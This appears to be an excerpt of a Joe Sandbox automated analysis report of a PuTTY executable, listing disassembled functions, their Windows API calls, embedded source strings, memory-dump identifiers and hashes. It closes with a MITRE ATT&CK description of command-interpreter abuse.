Opcode Fuzzy Hash: 3d30ccd1ceba34092cafc4d0f1a3b2e4368bc3923c79130f7ce692f233f60925
Instruction Fuzzy Hash: D831F8B59002959FCF368F50CD849AA7B75FF09315B18856AFC644A262C332CFA2DB81

Function 00BC36C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,0000014B,00000000,00000000), ref: 00BC3744

Strings

c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00BC370C
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC3707

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-2883471717
Opcode ID: 2ec412f6ae9c26f5b8c091f7f52c6abc3bec13387a163496ddacae0e3378811a
Instruction ID: fe4251708d9a6e51103014e865ee9fb52779181cf4c4fa600890f262ceade696
Opcode Fuzzy Hash: 2ec412f6ae9c26f5b8c091f7f52c6abc3bec13387a163496ddacae0e3378811a
Instruction Fuzzy Hash: E41126F1604208AFEB208B08CC85F3277E4EB46B18F5441BFF109872A1D762AD50CB91

Function 00BC3B30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,00000186,?,00000000), ref: 00BC3BC6

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC3B94
c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel, xrefs: 00BC3B99

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel
API String ID: 3015471070-795294906
Opcode ID: 5ba2b572d279bd0371bae74a7a4fb2f3a57433c2a65531b02efa37767732d600
Instruction ID: 80c786852d0d43b7efe421ea16a7515b303df25332b7b66ae58a305ff3e2a05d
Opcode Fuzzy Hash: 5ba2b572d279bd0371bae74a7a4fb2f3a57433c2a65531b02efa37767732d600
Instruction Fuzzy Hash: 6B11A971204205EFE720CE44EC86F66B3E9FB89B19F5180ADEA0497291C771AD55CBA2

Function 00BC3A90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,00000187,?,00000000), ref: 00BC3B1D

Strings

c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0, xrefs: 00BC3AFF
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC3AFA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0
API String ID: 3015471070-4034055451
Opcode ID: ffd4b4faae31114572034178037fa3504bed4d40aa61bbf0640956b0b2ee043c
Instruction ID: 7b9e1c4cdac6b87642e50b74ed94442c16a84e5f4003956d7a1d99f791968573
Opcode Fuzzy Hash: ffd4b4faae31114572034178037fa3504bed4d40aa61bbf0640956b0b2ee043c
Instruction Fuzzy Hash: FE11AD31204205EFD710DF58D886F2AB7E8FB59B15F4280A9F58497161C7B1ED64C761

Function 00BC3900 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,00000199,?,00000000), ref: 00BC3990

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC395E
c && c->ctrl->type == CTRL_LISTBOX, xrefs: 00BC3963

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX
API String ID: 3015471070-542244468
Opcode ID: f464d59d23b0139bcda932108ba8dc7705136f9fb0a1739679c9d6008683127a
Instruction ID: bd3fc13cf92354e71d8e297cb5b49d3f0850bc4958d940a026da07fe2d24dc43
Opcode Fuzzy Hash: f464d59d23b0139bcda932108ba8dc7705136f9fb0a1739679c9d6008683127a
Instruction Fuzzy Hash: C311E972204202EFE300CA04DC82F26B3E8FB89B14F4184BDE545A7280C7B2AC15CBA0

Function 00BC32A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CheckRadioButton.USER32(?,?,?,-00000001), ref: 00BC3326

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC32FE
c && c->ctrl->type == CTRL_RADIO, xrefs: 00BC3303

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ButtonCheckRadio
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_RADIO
API String ID: 2493629399-4068683935
Opcode ID: 780b0faf10a0bbe1389200807ebc50da0eba09059100085b07c3ab232b183191
Instruction ID: 1d73e01c21f486ee59063542aeaa057c650d45ba7644b30f48031ed1147cf4eb
Opcode Fuzzy Hash: 780b0faf10a0bbe1389200807ebc50da0eba09059100085b07c3ab232b183191
Instruction Fuzzy Hash: E1110472600211EFCB10CF44DC86F66B3E4FB89B14F4281ADE5449B601D772BC16CBA0

Function 00BCCC00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ClearCommBreak.KERNEL32(?), ref: 00BCCC56
CloseHandle.KERNEL32(?), ref: 00BCCC5F

Strings

Error writing to serial device, xrefs: 00BCCC77, 00BCCC87

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: BreakClearCloseCommHandle
String ID: Error writing to serial device
API String ID: 2685284230-3232346394
Opcode ID: 0f33351f1031744e643e1a06734f1e3d95afe3021301868e3683863022478d19
Instruction ID: 09970572eca4353ad67de3d5f6d21ba0516e31281312d3229efd649ca67c8456
Opcode Fuzzy Hash: 0f33351f1031744e643e1a06734f1e3d95afe3021301868e3683863022478d19
Instruction Fuzzy Hash: 2B114FB09047009FD730AF24E849F17BBE4EF10315F148A6DF85E862A1D735E955DB91

Function 00BC3400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,?,00000000), ref: 00BC3479

Strings

c && c->ctrl->type == CTRL_CHECKBOX, xrefs: 00BC3463
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC345E

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ButtonCheck
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_CHECKBOX
API String ID: 83588225-3903928787
Opcode ID: c591628056c1f11a2987c04742a1adce8400501f1f60d41677368a71758a6df8
Instruction ID: 7dc10ab86812228719a815ff2d46ad277590fd7f7dd9d425f4f6e3c59897ba95
Opcode Fuzzy Hash: c591628056c1f11a2987c04742a1adce8400501f1f60d41677368a71758a6df8
Instruction Fuzzy Hash: A501D632644201AFC3129A64DC45F77BBE8FB56B05F4980BAF88497211D372AD28C7A1

Function 00BC3490 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32(?,?), ref: 00BC34F9

Strings

c && c->ctrl->type == CTRL_CHECKBOX, xrefs: 00BC34E7
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC34E2

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ButtonChecked
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_CHECKBOX
API String ID: 1719414920-3903928787
Opcode ID: c809615a8b4abf8fdc162cc2a71324117d94e0d9aba626dbb2533cde6c935d02
Instruction ID: e0aca0cff3a680810927ad4c60ac8de87bb6c4335bc31120b647477d8c7e0686
Opcode Fuzzy Hash: c809615a8b4abf8fdc162cc2a71324117d94e0d9aba626dbb2533cde6c935d02
Instruction Fuzzy Hash: EDF02232300309EFE6129B54DD0AF66B3E8EB05B19F0540B9F50893221EB21AD248790

Function 00BC3BE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32(?,?,?), ref: 00BC3C56

Strings

c && c->ctrl->type == CTRL_TEXT, xrefs: 00BC3C43
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC3C3E

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemText
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_TEXT
API String ID: 3367045223-1229547454
Opcode ID: 9df12f08e56b50cd303b732814c9cfcb98e7fc63164d5e7a6c0cbd9e3540a420
Instruction ID: d4f9dba55adfdb32e9c21ee9c1957da53c102f2f1c98ba47b9c21c175dec915a
Opcode Fuzzy Hash: 9df12f08e56b50cd303b732814c9cfcb98e7fc63164d5e7a6c0cbd9e3540a420
Instruction Fuzzy Hash: 8E01AD72204315FFD710DE54E9C5F5BB7E8FB49B05F4184AAFA04A3211D372AC298BA1

Function 00C02CC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C02CE1
_strlen.LIBCMT ref: 00C02D16

Strings

|| , xrefs: 00C02D02

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID: ||
API String ID: 4218353326-1685714724
Opcode ID: 28fe8b1871d0b22f1d0657d4c3de775778c9b69288cf1abb66f17542d0f7a448
Instruction ID: a5c0c169db6ef273c1d77572c2dcb97d765dede8754a879f45535e721afb309b
Opcode Fuzzy Hash: 28fe8b1871d0b22f1d0657d4c3de775778c9b69288cf1abb66f17542d0f7a448
Instruction Fuzzy Hash: A4018FBA8012087FD210BB10EC46A5AB39DEB91399F050871FD0887352F6266A69C6E6

Function 00BCD8BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BCD8EF
_strlen.LIBCMT ref: 00BCD925

Strings

the -pw option can only be used with the SSH protocol, xrefs: 00BCDE5B

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID: the -pw option can only be used with the SSH protocol
API String ID: 4218353326-1177616114
Opcode ID: 4b83b6c3c240c62c1718302dcff405d5e14f9157ed0b24a52162cf56575286da
Instruction ID: e33840f88d4d6ccf97b84b0a06add0bae10f7f170e826b171975d621b1ec1d23
Opcode Fuzzy Hash: 4b83b6c3c240c62c1718302dcff405d5e14f9157ed0b24a52162cf56575286da
Instruction Fuzzy Hash: 4C01F5FED0424067E61167207C93B7E72E4ABA2708F08007AE84A57243FB75E9169363

Function 00BA6290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001,?,?,?,?,00000000,00000000), ref: 00BA62D6
MessageBoxA.USER32(00000000,00000000,00000010), ref: 00BA6302

Strings

%s Error, xrefs: 00BA62E9

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CursorMessageShow
String ID: %s Error
API String ID: 2689832819-1420171443
Opcode ID: 63ad17304f74aa4fdb91e6988cb3df6ea5a29ee468488709321eca20e447d4e3
Instruction ID: ff73f922c5a1fb1d5021d493404856179fc550c87936a3cbd17ce1e7e2367e2f
Opcode Fuzzy Hash: 63ad17304f74aa4fdb91e6988cb3df6ea5a29ee468488709321eca20e447d4e3
Instruction Fuzzy Hash: 130124B5900200AFD6157B24FC0BB2E7BA4DB56709F04003DF8864A3A2FA625804DBA3

Function 00BAB140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Unsupported protocol number found,00000000,00000030), ref: 00BAB18B

Strings

Unsupported protocol number found, xrefs: 00BAB184
%s Internal Error, xrefs: 00BAB172

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Message
String ID: %s Internal Error$Unsupported protocol number found
API String ID: 2030045667-184558026
Opcode ID: e36c05ebe27bacb09e287680684ea27e6e9afec5fc0bd0e6f046a8c2e7f4c75d
Instruction ID: 80202521b711b8f6be61032bf3a8275ca4e87fa2f73caa4f5fc7a08c2b1581d5
Opcode Fuzzy Hash: e36c05ebe27bacb09e287680684ea27e6e9afec5fc0bd0e6f046a8c2e7f4c75d
Instruction Fuzzy Hash: B9E02B719542007EEE2037647C17F5E31889B12B16F084075FD06A42F3FAB28E1082A7

Function 00BBF3D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000223), ref: 00BBF40B

Strings

The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging., xrefs: 00BBF3DE
%s Log to File, xrefs: 00BBF3F3

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Message
String ID: %s Log to File$The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging.
API String ID: 2030045667-4035860868
Opcode ID: f761994f4079e84be9375205d1762b0bbe377baf4a10a0392b79a9ff1bdca29c
Instruction ID: a41dbdeafaa9d386c3656cd630df7392126f4f4c4eec65838cb3ae726d4a1b7b
Opcode Fuzzy Hash: f761994f4079e84be9375205d1762b0bbe377baf4a10a0392b79a9ff1bdca29c
Instruction Fuzzy Hash: D7F0A7F7B042007BE50136A17C8BF6E76D8CB86B56F040076FA05DA3D2F9664D1197A6

Function 00C08810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(00000000,?), ref: 00C08822
GetSystemDirectoryA.KERNEL32(00000000), ref: 00C08866

Strings

`%, xrefs: 00C08811, 00C0885A, 00C08870

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: DirectorySystem
String ID: `%
API String ID: 2188284642-3167696263
Opcode ID: 4da5b974e009ddebcf6e425197941848a62ac312e8139edf11c4fb6e269225a7
Instruction ID: 4a9a6310bc51e4cb1683b3b41fb53f544e67416efea0834dac825d678aac1086
Opcode Fuzzy Hash: 4da5b974e009ddebcf6e425197941848a62ac312e8139edf11c4fb6e269225a7
Instruction Fuzzy Hash: D7F0C931940A00AEDA119B10FC45B5D3B69B30F70EFA0C125F5059B1F1C769A8C7CB94

Function 00BDBF50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BDBF81

Strings

SetDefaultDllDirectories, xrefs: 00BDBF7B
kernel32.dll, xrefs: 00BDBF65

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressProc
String ID: SetDefaultDllDirectories$kernel32.dll
API String ID: 190572456-2102062458
Opcode ID: f78bca6158d6fd98c182e0e399e8f2d5cec3a5d71bfb99c9700193e71c2de2f9
Instruction ID: d7ad91aa2da2f5f96b46779d37b2313c3dbfdc87716a07eed10674e60f49de10
Opcode Fuzzy Hash: f78bca6158d6fd98c182e0e399e8f2d5cec3a5d71bfb99c9700193e71c2de2f9
Instruction Fuzzy Hash: 41E0C0B4A4AB03DEDF195B246C75B2D61D59B5170AB07817FA406D6390FB70C8008E45

Function 00C07B00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 00C07B3C

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c, xrefs: 00C07B0F
h->type == HT_INPUT, xrefs: 00C07B14

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Event
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c$h->type == HT_INPUT
API String ID: 4201588131-945550184
Opcode ID: bf56a8b6a7cb8919880dc1635d74b58ed2548311ad3cbe04a37720cf7882037a
Instruction ID: e7cbb5b34e42c43f56fb112a18645bd8ba29d964e09d49856610a8afe01633c9
Opcode Fuzzy Hash: bf56a8b6a7cb8919880dc1635d74b58ed2548311ad3cbe04a37720cf7882037a
Instruction Fuzzy Hash: 9EE09230C0C781AFEB395A14E80DB927BE0AB01315F04497DE295110D187B47ECEC752

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

